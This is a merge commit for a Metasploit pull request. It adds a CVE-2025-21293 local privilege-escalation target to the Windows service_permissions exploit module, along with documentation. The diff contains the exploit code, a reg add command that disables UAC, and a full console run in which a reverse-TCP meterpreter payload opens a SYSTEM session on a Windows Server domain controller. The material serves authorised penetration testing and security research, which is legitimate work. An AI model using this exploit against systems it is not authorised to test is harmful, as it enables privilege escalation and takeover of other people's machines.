Merge pull request rapid7#20044 from jheysel-r7/cve_2025_21293

bwatters-r7 · web-flow · commit 98702a632606 · 2025-04-17T13:24:46.000-05:00
Updated service_permissions with action to exploit CVE-2025-21293
diff --git a/documentation/modules/exploit/windows/local/service_permissions.md b/documentation/modules/exploit/windows/local/service_permissions.md
@@ -58,6 +58,27 @@ The name of a specific service to target. This can be used to avoid targeting al
 the module user wants to target a specific one. When specified, the service name is compared to others in a
 case-insensitive manner per the [`CreateServiceA`][CreateServiceA] documentation.
 
+## Actions
+
+### Exploit CVE-2025-21293
+Prior to the January 2025 Windows update, users who are apart of the `Network Configuration Operators` group have the
+`CreateSubKey` Registry Right under the `HKLM\System\CurrentControlSet\Services\Dnscache\` registry key (which is the
+crux of CVE-2025-21293). This allows them to exploit the Weak Registry Permissions technique included in this module
+to gain SYSTEM privileges.
+
+However there are a few caveats to this. As mentioned in the original [research paper](https://birkep.github.io/posts/Windows-LPE/)
+there is a chance that the session will be established in the context of `nt authority\local service` and not `nt authority\system`.
+If this happens, rerun the module.
+
+Also if UAC is enabled, despite having `CreateSubKey` RegistryRight under the
+`HKLM\System\CurrentControlSet\Services\Dnscache\` registry key, Windows will not let you create the registry key as a
+non-admin user. In order to exploit CVE-2025-21293, remotely and from Metasploit, you need to disable UAC. This can be
+done by running the following command in an elevated command prompt and then rebooting the system:
+
+```
+reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
+```
+
 ## Scenarios
 Specific demo of using the module that might be useful in a real world scenario.
 
@@ -156,3 +177,65 @@ meterpreter >
 ```
 
 [CreateServiceA]: https://docs.microsoft.com/en-us/windows/win32/api/winsvc/nf-winsvc-createservicea
+
+### Scenario: Windows Server 2019. Action: CVE-2025-21293
+
+```
+msf6 exploit(windows/local/service_permissions) > set lhost 172.16.199.1
+lhost => 172.16.199.1
+msf6 exploit(windows/local/service_permissions) > set lport 6665
+lport => 6665
+msf6 exploit(windows/local/service_permissions) > set payload windows/x64/meterpreter/reverse_tcp
+payload => windows/x64/meterpreter/reverse_tcp
+msf6 exploit(windows/local/service_permissions) > set target 1
+target => 1
+msf6 exploit(windows/local/service_permissions) > options
+
+Module options (exploit/windows/local/service_permissions):
+
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   AGGRESSIVE  false            no        Exploit as many services as possible (dangerous)
+   SESSION     -1               yes       The session to run this module on
+   TIMEOUT     10               yes       Timeout for WMI command in seconds
+
+
+Payload options (windows/x64/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     172.16.199.1     yes       The listen address (an interface may be specified)
+   LPORT     6665             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Exploit CVE-2025-21293
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(windows/local/service_permissions) > run
+[*] Started reverse TCP handler on 172.16.199.1:6665
+[*] exploiting Exploit CVE-2025-21293
+[+] [Dnscache] Created registry key: HKLM\System\CurrentControlSet\Services\Dnscache\Performance
+[*] Sending stage (203846 bytes) to 172.16.199.200
+[+] Deleted C:\Users\msfuser\AppData\Local\Temp\VcsHZcFQ.dll
+[*] Meterpreter session 8 opened (172.16.199.1:6665 -> 172.16.199.200:49807) at 2025-04-16 09:42:35 -0700
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : DC2
+OS              : Windows Server 2019 (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : KERBEROS
+Logged On Users : 5
+Meterpreter     : x64/windows
+meterpreter >
+```
diff --git a/modules/exploits/windows/local/service_permissions.rb b/modules/exploits/windows/local/service_permissions.rb
@@ -38,20 +38,26 @@ def initialize(info = {})
         'Arch' => [ ARCH_X86, ARCH_X64 ],
         'Platform' => [ 'win' ],
         'SessionTypes' => [ 'meterpreter' ],
-        'DefaultOptions' =>
-          {
-            'EXITFUNC' => 'thread',
-            'WfsDelay' => '5'
-          },
-        'Targets' =>
-          [
-            [ 'Automatic', {} ],
-          ],
+        'DefaultOptions' => {
+          'EXITFUNC' => 'thread',
+          'WfsDelay' => '5'
+        },
+        'Targets' => [
+          [ 'Automatic', {} ],
+          [ 'Exploit CVE-2025-21293', {} ]
+        ],
         'References' => [
-          ['URL', 'https://itm4n.github.io/windows-registry-rpceptmapper-eop/']
+          ['URL', 'https://itm4n.github.io/windows-registry-rpceptmapper-eop/'],
+          ['URL', 'https://birkep.github.io/posts/Windows-LPE/'],
+          ['CVE', '2025-21293'],
         ],
         'DefaultTarget' => 0,
-        'DisclosureDate' => '2012-10-15'
+        'DisclosureDate' => '2012-10-15',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        },
       )
     )
 
@@ -68,7 +74,7 @@ def execute_payload_as_new_service(path)
     success = false
 
     print_status('Trying to add a new service...')
-    service_name = Rex::Text.rand_text_alpha((rand(6..13)))
+    service_name = Rex::Text.rand_text_alpha(rand(6..13))
     if service_create(service_name, { path: path, display: '' }) == ERROR::SUCCESS
       print_status("Created service... #{service_name}")
       write_exe(path, service_name)
@@ -95,7 +101,7 @@ def weak_service_permissions(service_name, service, path)
       print_status("[#{service_name}] Restarting service")
       res = service_stop(service_name)
 
-      if ((res == ERROR::SUCCESS) || (res == ERROR::SERVICE_NOT_ACTIVE))
+      if (res == ERROR::SUCCESS) || (res == ERROR::SERVICE_NOT_ACTIVE)
         write_exe(path, service_name)
         if service_restart(service_name)
           print_good("[#{service_name}] Service restarted")
@@ -144,7 +150,7 @@ def weak_file_permissions(service_name, service, _path, token)
           stopped = true
         else
           res = service_stop(service_name)
-          stopped = ((res == ERROR::SUCCESS) || (res == ERROR::SERVICE_NOT_ACTIVE))
+          stopped = (res == ERROR::SUCCESS) || (res == ERROR::SERVICE_NOT_ACTIVE)
         end
       rescue RuntimeError => e
         vprint_error("[#{service_name}] #{e} ")
@@ -156,7 +162,7 @@ def weak_file_permissions(service_name, service, _path, token)
           if move_file(possible_path, "#{possible_path}.bak")
             write_exe(possible_path, service_name)
             print_status("[#{service_name}] #{possible_path} moved to #{possible_path}.bak and replaced.")
-            if service_restart(service_name) # rubocop:disable Metrics/BlockNesting
+            if service_restart(service_name)
               print_good("[#{service_name}] Service restarted")
               success = true
             else
@@ -260,14 +266,21 @@ def exploit
     end
 
     if sysinfo['Architecture'] != payload_arch
-      print_error('The registry technique will be skipped because the payload architecture does not match the native system architecture')
+      print_error('The registry technique will be skipped because the payload architecture selected does not match the payload architecture of the session being used in the exploit.')
     end
     tempexe_name = "#{Rex::Text.rand_text_alpha(rand(6..13))}.exe"
 
     dir_env = get_envs('SystemRoot', 'TEMP')
     tmpdir = dir_env['TEMP']
     tempexe = "#{tmpdir}\\#{tempexe_name}"
 
+    if target.name == 'Exploit CVE-2025-21293'
+      print_status('Exploiting CVE-2025-21293')
+      fail_with(Failure::BadConfig, 'To exploit CVE-2025-21293 through a remote shell UAC must be disabled') if is_uac_enabled?
+      weak_registry_permissions('Dnscache')
+      return
+    end
+
     if datastore['TargetServiceName'].blank?
       begin
         return if execute_payload_as_new_service(tempexe)
@@ -283,7 +296,7 @@ def exploit
     token = get_imperstoken
     each_service do |serv|
       service_name = serv[:name]
-      next unless (datastore['TargetServiceName'].blank? || datastore['TargetServiceName'].downcase == service_name.downcase)
+      next unless datastore['TargetServiceName'].blank? || datastore['TargetServiceName'].downcase == service_name.downcase
 
       service = service_info(service_name)
 
